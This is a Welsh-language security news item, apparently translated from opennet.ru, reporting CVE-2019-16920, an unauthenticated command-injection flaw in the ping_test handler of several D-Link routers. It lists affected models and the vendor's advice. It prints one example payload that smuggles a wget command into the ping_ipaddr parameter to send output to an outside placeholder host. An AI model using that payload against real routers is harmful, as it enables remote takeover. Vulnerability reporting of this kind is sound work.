Gwendid y gellir ei ecsbloetio o bell mewn llwybryddion D-Link

Mewn llwybryddion diwifr D-Link a nodwyd bregusrwydd peryglus (CVE-2019–16920), sy'n eich galluogi i weithredu cod o bell ar ochr y ddyfais trwy anfon cais arbennig at y triniwr “ping_test”, sy'n hygyrch heb ddilysiad.

Yn ddiddorol, yn ôl y datblygwyr firmware, dim ond ar ôl dilysu y dylid gweithredu'r alwad “ping_test”, ond mewn gwirionedd fe'i gelwir yn unrhyw achos, waeth beth fo mewngofnodi i'r rhyngwyneb gwe. Yn benodol, wrth gyrchu'r sgript app_sec.cgi a phasio'r paramedr “action=ping_test”, mae'r sgript yn ailgyfeirio i'r dudalen ddilysu, ond ar yr un pryd yn cyflawni'r weithred sy'n gysylltiedig â ping_test. I weithredu'r cod, defnyddiwyd bregusrwydd arall yn ping_test ei hun, sy'n galw'r cyfleustodau ping heb wirio cywirdeb y cyfeiriad IP a anfonwyd i'w brofi yn iawn. Er enghraifft, i alw'r cyfleustodau wget a throsglwyddo canlyniadau'r gorchymyn “echo 1234” i westeiwr allanol, nodwch y paramedr “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( adlais 1234)".

Gwendid y gellir ei ecsbloetio o bell mewn llwybryddion D-Link

Mae presenoldeb y bregusrwydd wedi'i gadarnhau'n swyddogol yn y modelau canlynol:

  • DIR-655 gyda firmware 3.02b05 neu hŷn;
  • DIR-866L gyda firmware 1.03b04 neu hŷn;
  • DIR-1565 gyda firmware 1.01 neu hŷn;
  • DIR-652 (ni ddarperir gwybodaeth am fersiynau cadarnwedd problemus)

Mae'r cyfnod cymorth ar gyfer y modelau hyn eisoes wedi dod i ben, felly D-Link dywedodd, na fydd yn rhyddhau diweddariadau iddynt ddileu'r bregusrwydd, nid yw'n argymell eu defnyddio ac yn cynghori eu disodli â dyfeisiau newydd. Fel ateb diogelwch, gallwch gyfyngu mynediad i'r rhyngwyneb gwe i gyfeiriadau IP dibynadwy yn unig.

Darganfuwyd yn ddiweddarach bod y bregusrwydd hefyd yn effeithio modelau DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 a DIR-825, cynlluniau ar gyfer rhyddhau diweddariadau nad ydynt yn hysbys eto.

Ffynhonnell: opennet.ru

Ychwanegu sylw